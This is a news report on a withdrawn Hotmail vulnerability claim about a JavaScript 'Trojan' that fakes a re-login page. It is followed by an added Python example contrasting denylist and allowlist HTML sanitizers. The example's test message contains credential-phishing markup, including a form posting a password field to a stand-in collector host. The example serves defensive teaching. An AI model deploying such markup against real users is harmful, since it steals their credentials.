Security firm pulls Hotmail hole report

The Canadian company drops allegations of a vulnerability in the Web-based e-mail service, saying the problem had been fixed weeks before.

A Canadian computer security company on Friday dropped allegations of a vulnerability in Microsoft's Hotmail Web-based e-mail service, saying the problem it announced in a press release earlier this week had been fixed weeks before.

The exploit was described on the Bugtraq security mailing list Jan. 26 and was repaired within days, according to Microsoft's security response team. Microsoft on Friday said that security firm Neurocom had violated standard bug-reporting protocols by going public with the alleged vulnerability on Wednesday before contacting the company's security team.

"Our purpose was not to punish Microsoft at all," said Cyril Simonnet, an executive at Neurocom's Canada division. "Our purpose is just to find security breaches."

Neurocom issued the warning over a security hole involving a malicious program known as a Trojan horse, which passes itself off as another application. In this case, potential hackers could use the Trojan horse, written in HTML (Hypertext Markup Language), to create a "perfect replica" of Hotmail's re-login page, according to Neurocom.

The company said that other sites providing Web-based e-mail may also be vulnerable to a similar attack.

"It's a new instance of an old problem," said Elias Levy, chief technology officer for SecurityFocus.com. "It's another way to get past those filters, and it's probably not going to be the last."

Scott Culp, a program manager with Microsoft's Security Response Center, said he is not sure why Neurocom did not contact Microsoft before issuing its statement this week.

"Most people in the security industry follow a code of conduct in which they give the vendor notice of anything that they believe affects that vendor's product," he said.

Neurocom said filters have been incorporated to limit the use of certain HTML or JavaScript code that potentially threatens security. For example, in 1998, Microsoft implemented a filter to plug JavaScript security holes.

However, Neurocom said in a statement that "the breaches in question come from omissions in the conception of these filters" and that the procedure to hack into an e-mail system "is relatively simple and requires very little technical knowledge."

A Trojan horse using JavaScript sent within an HTML message could trick Web-based e-mail users into handing over usernames and passwords. JavaScript, a Web scripting language developed by Netscape Communications, executes actions on a Web page without user input. The language is commonly used for launching pop-up windows or scrolling text.

SecurityFocus' Levy said a malicious person could use a JavaScript-based Trojan horse to create a window that looks like a sign-in page. An e-mail user would then be fooled into entering a username and password, which the malicious person could obtain.

Microsoft and other companies that run Web-based e-mail systems commonly try to filter out known ways of inserting malicious JavaScript code or other problems, according to Levy. He said that instead of taking this approach, it would be best to allow only known good content. That way, users are still protected when new methods of encoding JavaScript are used.
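
The difference between the two approaches Levy describes can be seen in a small filter pair. This is an added example, not code from Hotmail, Neurocom or the article; the tag and scheme policy, the function names and the sample message are all assumptions made for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed policy for this example: what an HTML mail body may keep.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "a", "ul", "ol", "li", "blockquote"}
URL_ATTRS = {"a": {"href"}}  # every permitted attribute holds a URL
SCHEMES = ("http://", "https://", "mailto:")
DROP_WITH_CONTENT = {"script", "style"}

# Constructed sample message, not taken from the Bugtraq report.
SAMPLE = ('<p onmouseover="notify()">Session expired</p>'
          '<form action="http://collector.invalid/"><input name="passwd"></form>'
          '<a href="javascript:void(0)">Sign in</a><script>notify()</script>')

def denylist_filter(html):
    """Known-bad approach: strip <script> elements, pass everything else."""
    return re.sub(r"(?is)<script\b.*?</script\s*>", "", html)

class AllowlistSanitizer(HTMLParser):
    """Known-good approach: rebuild the message from permitted pieces only."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
        if self.skip or tag not in ALLOWED_TAGS:
            return  # unlisted tag is dropped; its text survives as plain text
        kept = []
        for name, value in attrs:  # values arrive with entities already decoded
            value = (value or "").strip()
            if name in URL_ATTRS.get(tag, ()) and value.lower().startswith(SCHEMES):
                kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))

def allowlist_filter(html):
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

On the sample, the denylist removes only the `<script>` element and leaves the event handler, the form and the scripted link in place, while the allowlist returns `<p>Session expired</p><a>Sign in</a>` without needing to know about any of them.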